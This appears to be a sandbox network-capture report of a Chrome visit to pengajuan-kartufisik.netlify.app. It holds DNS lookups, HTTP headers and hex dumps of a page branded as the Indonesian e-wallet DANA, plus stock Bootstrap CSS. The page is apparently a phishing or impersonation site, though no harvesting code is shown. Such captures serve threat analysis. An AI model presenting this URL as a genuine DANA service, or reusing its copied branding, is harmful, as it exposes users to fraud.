      Sep 27, 2024 04:26:42.577909946 CEST1.1.1.1192.168.2.60xdc7fNo error (0)www.dana.idwww.dana.id.edgesuite.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:42.681561947 CEST1.1.1.1192.168.2.60x7eaaNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:42.682080030 CEST1.1.1.1192.168.2.60xf688No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:42.683540106 CEST1.1.1.1192.168.2.60xa584No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.683540106 CEST1.1.1.1192.168.2.60xa584No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.684350967 CEST1.1.1.1192.168.2.60xdbffNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
      Sep 27, 2024 04:26:42.692734003 CEST1.1.1.1192.168.2.60xbce9No error (0)i.ibb.co162.19.58.156A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.692734003 CEST1.1.1.1192.168.2.60xbce9No error (0)i.ibb.co162.19.58.158A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.692734003 CEST1.1.1.1192.168.2.60xbce9No error (0)i.ibb.co162.19.58.157A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.692734003 CEST1.1.1.1192.168.2.60xbce9No error (0)i.ibb.co162.19.58.161A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.692734003 CEST1.1.1.1192.168.2.60xbce9No error (0)i.ibb.co162.19.58.160A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.692734003 CEST1.1.1.1192.168.2.60xbce9No error (0)i.ibb.co162.19.58.159A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.755961895 CEST1.1.1.1192.168.2.60xbca8No error (0)pengajuan-kartufisik.netlify.app3.72.140.173A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.755961895 CEST1.1.1.1192.168.2.60xbca8No error (0)pengajuan-kartufisik.netlify.app3.70.101.28A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.760071993 CEST1.1.1.1192.168.2.60x9f0aNo error (0)a.m.dana.ida.m.dana.id.edgesuite.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:42.760951996 CEST1.1.1.1192.168.2.60x8096No error (0)a.m.dana.ida.m.dana.id.edgesuite.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:47.306999922 CEST1.1.1.1192.168.2.60xe470No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:47.306999922 CEST1.1.1.1192.168.2.60xe470No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:47.817307949 CEST1.1.1.1192.168.2.60xf652No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:47.817307949 CEST1.1.1.1192.168.2.60xf652No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
      • pengajuan-kartufisik.netlify.app
      • https:
        • maxcdn.bootstrapcdn.com
        • cdn.jsdelivr.net
        • code.ionicframework.com
        • cdnjs.cloudflare.com
        • i.ibb.co
      • fs.microsoft.com
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.64970552.58.254.253801672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      Sep 27, 2024 04:26:36.464027882 CEST447OUTGET / HTTP/1.1
      Host: pengajuan-kartufisik.netlify.app
      Connection: keep-alive
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Sep 27, 2024 04:26:37.082736015 CEST303INHTTP/1.1 301 Moved Permanently
      Content-Type: text/plain; charset=utf-8
      Date: Fri, 27 Sep 2024 02:26:36 GMT
      Location: https://pengajuan-kartufisik.netlify.app/
      Server: Netlify
      X-Nf-Request-Id: 01J8RMTDSZEF54J61KK0C54QDE
      Content-Length: 56
      Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 65 6e 67 61 6a 75 61 6e 2d 6b 61 72 74 75 66 69 73 69 6b 2e 6e 65 74 6c 69 66 79 2e 61 70 70 2f
      Data Ascii: Redirecting to https://pengajuan-kartufisik.netlify.app/


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.6497063.70.101.284431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:37 UTC675OUTGET / HTTP/1.1
      Host: pengajuan-kartufisik.netlify.app
      Connection: keep-alive
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      sec-ch-ua-platform: "Windows"
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:38 UTC438INHTTP/1.1 200 OK
      Accept-Ranges: bytes
      Age: 1
      Cache-Control: public,max-age=0,must-revalidate
      Cache-Status: "Netlify Edge"; fwd=miss
      Content-Length: 13041
      Content-Type: text/html; charset=UTF-8
      Date: Fri, 27 Sep 2024 02:26:38 GMT
      Etag: "0e49d6f061e70f3b165fc755685bb555-ssl"
      Server: Netlify
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      X-Nf-Request-Id: 01J8RMTEQV09QMQQYQ849VQZC4
      Connection: close
      2024-09-27 02:26:38 UTC748INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 64 61 74 61 2d 68 69 64 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 31 38 65 65 39
      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta data-n-head="ssr" charset="utf-8"><meta data-n-head="ssr" name="viewport" content="width=device-width, initial-scale=1"><meta data-n-head="ssr" data-hid="theme-color" name="theme-color" content="#118ee9
      2024-09-27 02:26:38 UTC2372INData Raw: 2e 69 64 22 3e 0d 0a 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 64 61 74 61 2d 68 69 64 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 41 4e 41 20 61 64 61 6c 61 68 20 62 65 6e 74 75 6b 20 62 61 72 75 20 75 61 6e 67 20 74 75 6e 61 69 20 79 61 6e 67 20 6c 65 62 69 68 20 62 61 69 6b 2e 20 54 72 61 6e 73 61 6b 73 69 20 61 70 61 70 75 6e 2c 20 62 65 72 61 70 61 70 75 6e 20 64 61 6e 20 64 69 6d 61 6e 61 70 75 6e 20 6a 61 64 69 20 6d 75 64 61 68 20 62 65 72 73 61 6d 61 20 44 41 4e 41 2e 20 41 6d 62 69 6c 20 62 61 67 69 61 6e 20 64 61 6c 61 6d 20 74 72 61 6e 73 66 6f 72 6d 61 73 69 20 6b 65 75 61 6e 67 61 6e 20 64 69 67 69 74 61 6c 20 64 69 20 49 6e
      Data Ascii: .id"><meta data-n-head="ssr" data-hid="description" name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di In
      2024-09-27 02:26:38 UTC538INData Raw: 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6c 72 2d 69 6e 67 65 73 74 2e 69 6f 22 3e 0d 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6c 72 2d 69 6e 67 65 73 74 2e 69 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 44 41 4e 41 20 2d 20 41 70 61 20 70 75 6e 20 74 72 61 6e 73 61 6b 73 69 6e 79 61 20 73 65 6c 61 6c 75 20 61 64 61 20 44 41 4e 41 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 69 6f 6e 69 63 66 72 61 6d 65 77 6f 72 6b 2e 63 6f 6d 2f 69 6f 6e 69 63 6f 6e 73 2f 32 2e 30 2e 31 2f 63
      Data Ascii: nnect" href="https://cdn.lr-ingest.io"><link data-n-head="ssr" rel="dns-prefetch" href="https://cdn.lr-ingest.io"><title>DANA - Apa pun transaksinya selalu ada DANA</title><link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/c
      2024-09-27 02:26:38 UTC4744INData Raw: 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 73 6c 69 63 6b 2d 63 61 72 6f 75 73 65 6c 40 31 2e 38 2e 31 2f 73 6c 69 63 6b 2f 73 6c 69 63 6b 2d 74 68 65 6d 65 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 32 2e 30 2d 62 65 74 61 31 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 30 65 76 48 65 2f 58 2b 52 37 59 6b 49 5a 44 52 76 75 7a 4b 4d 52 71 4d 2b 4f 72 42 6e 56 46 42 4c 36 44 4f 69 74 66 50 72 69 34
      Data Ascii: s" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css" /><link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4
      2024-09-27 02:26:38 UTC4639INData Raw: 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2f 2a 20 6d 61 6b 65 20 62 75 74 74 6f 6e 20 6c 61 72 67 65 72 20 61 6e 64 20 63 68 61 6e 67 65 20 74 68 65 69 72 20 70 6f 73 69 74 69 6f 6e 73 20 2a 2f 0d 0a 20 20 20 20 2e 73 6c 69 63 6b 2d 70 72 65 76 2c 0d 0a 20 20 20 20 2e 73 6c 69 63 6b 2d 6e 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 73 6c 69 63 6b 2d 70 72 65 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 70 78 3b 0d 0a 20 20 20 20 7d 0d
      Data Ascii: 100%; margin-top: 0px; } /* make button larger and change their positions */ .slick-prev, .slick-next { width: 0px; height: 0px; z-index: 1; } .slick-prev { left: 0px; }


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.649709104.18.11.2074431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC590OUTGET /bootstrap/3.3.5/css/bootstrap.min.css HTTP/1.1
      Host: maxcdn.bootstrapcdn.com
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: text/css,*/*;q=0.1
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: style
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC903INHTTP/1.1 200 OK
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      Content-Type: text/css; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      CDN-PullZone: 252412
      CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
      CDN-RequestCountryCode: US
      Access-Control-Allow-Origin: *
      Cache-Control: public, max-age=31919000
      ETag: W/"5d5357cb3704e1f43a1f5bfed2aebf42"
      Last-Modified: Mon, 25 Jan 2021 22:03:59 GMT
      CDN-ProxyVer: 1.03
      CDN-RequestPullSuccess: True
      CDN-RequestPullCode: 200
      CDN-CachedAt: 01/30/2023 12:48:48
      CDN-EdgeStorageId: 718
      timing-allow-origin: *
      cross-origin-resource-policy: cross-origin
      X-Content-Type-Options: nosniff
      CDN-Status: 200
      CDN-RequestId: fde036789c7315304415843c399085ea
      CDN-Cache: HIT
      CF-Cache-Status: HIT
      Age: 17046330
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Server: cloudflare
      CF-RAY: 8c980cd40ff74372-EWR
      2024-09-27 02:26:39 UTC466INData Raw: 37 63 31 39 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 35 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 33 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b
      Data Ascii: 7c19/*! * Bootstrap v3.3.5 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{
      2024-09-27 02:26:39 UTC1369INData Raw: 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 5b 68 69 64 64 65 6e 5d 2c 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 6f 75 74 6c 69 6e 65 3a 30 7d 61 62 62 72 5b 74 69 74 6c 65 5d 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 64 6f 74 74 65 64 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d
      Data Ascii: progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}
      2024-09-27 02:26:39 UTC1369INData Raw: 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 7d 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 63 61 6e 63 65 6c 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 2e 33 35 65 6d 20 2e 36 32 35 65 6d 20 2e 37 35 65 6d 3b 6d 61 72 67 69 6e
      Data Ascii: g:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}fieldset{padding:.35em .625em .75em;margin
      2024-09-27 02:26:39 UTC1369INData Raw: 3a 27 47 6c 79 70 68 69 63 6f 6e 73 20 48 61 6c 66 6c 69 6e 67 73 27 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 29 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 3f 23 69 65 66 69 78 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c
      Data Ascii: :'Glyphicons Halflings';src:url(../fonts/glyphicons-halflings-regular.eot);src:url(../fonts/glyphicons-halflings-regular.eot?#iefix) format('embedded-opentype'),url(../fonts/glyphicons-halflings-regular.woff2) format('woff2'),url(../fonts/glyphicons-halfl
      2024-09-27 02:26:39 UTC1369INData Raw: 6e 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 7a 6f 6f 6d 2d 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 7a 6f 6f 6d 2d 6f 75 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 69 67 6e 61 6c 3a 62 65 66
      Data Ascii: n-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyphicon-off:before{content:"\e017"}.glyphicon-signal:bef
      2024-09-27 02:26:39 UTC1369INData Raw: 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 6f 6c 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 74 61 6c 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 65 78 74 2d 68 65 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 65 78 74 2d 77 69 64 74 68 3a 62 65 66 6f
      Data Ascii: before{content:"\e045"}.glyphicon-camera:before{content:"\e046"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-height:before{content:"\e050"}.glyphicon-text-width:befo
      2024-09-27 02:26:39 UTC1369INData Raw: 2d 65 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 6c 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 69 6e 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 6d 6f 76 65 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65
      Data Ascii: -eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{content:"\e082"}.glyphicon-remove-sign:before{content:"\e
      2024-09-27 02:26:39 UTC1369INData Raw: 6e 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 74 77 65 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6c 64 65 72 2d 63 6c 6f 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c
      Data Ascii: n-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:before{content:"\e114"}.glyphicon-retweet:before{content:"\e115"}.glyphicon-shopping-cart:before{content:"\e116"}.glyphicon-folder-close:before{content:"\
      2024-09-27 02:26:39 UTC1369INData Raw: 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 65 61 72 74 2d 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6c 69 6e 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 75 73 68 70 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 75 73 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 67 62 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65
      Data Ascii: {content:"\e142"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}.glyphicon-phone:before{content:"\e145"}.glyphicon-pushpin:before{content:"\e146"}.glyphicon-usd:before{content:"\e148"}.glyphicon-gbp:before{content:"\e
